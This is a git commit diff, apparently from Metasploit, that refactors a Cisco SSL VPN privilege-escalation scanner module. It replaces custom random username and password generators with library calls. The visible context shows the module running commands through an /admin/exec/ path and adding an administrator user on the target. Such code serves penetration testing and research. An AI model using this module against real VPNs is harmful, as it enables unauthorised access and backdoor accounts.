Use Rex::Text.rand_text*

jvazquez-r7 · jvazquez-r7 · commit dc253efa1938 · 2014-11-25T16:35:06.000-06:00
diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb
@@ -96,7 +96,7 @@ def do_logout(cookie)
   end
 
   def run_command(cmd, cookie)
-    reformatted_cmd = cmd.split(" ").join("+")
+    reformatted_cmd = cmd.gsub(/ /, "+")
 
     res = send_request_cgi(
             'uri'       => "/admin/exec/#{reformatted_cmd}",
@@ -126,8 +126,8 @@ def do_show_version(cookie, tries = 3)
   end
 
   def add_user(cookie, tries = 3)
-    username = random_username
-    password = random_password
+    username = Rex::Text.rand_text_alpha_lower(8)
+    password = Rex::Text.rand_text_alphanumeric(20)
 
     tries.times do |i|
       vprint_good("#{peer} - Attemping to add User: #{username}, Pass: #{password}")
@@ -148,18 +148,6 @@ def add_user(cookie, tries = 3)
     return nil
   end
 
-  # Generates a random password of arbitrary length
-  def random_password(length = 20)
-    char_array = [('a'..'z'), ('A'..'Z'), ('0'..'9')].map { |i| i.to_a }.flatten
-    (0...length).map { char_array[rand(char_array.length)] }.join
-  end
-
-  # Generates a random username of arbitrary length
-  def random_username(length = 8)
-    char_array = [('a'..'z')].map { |i| i.to_a }.flatten
-    (0...length).map { char_array[rand(char_array.length)] }.join
-  end
-
   def do_login(user, pass, group)
     begin
       cookie = "webvpn=; " +
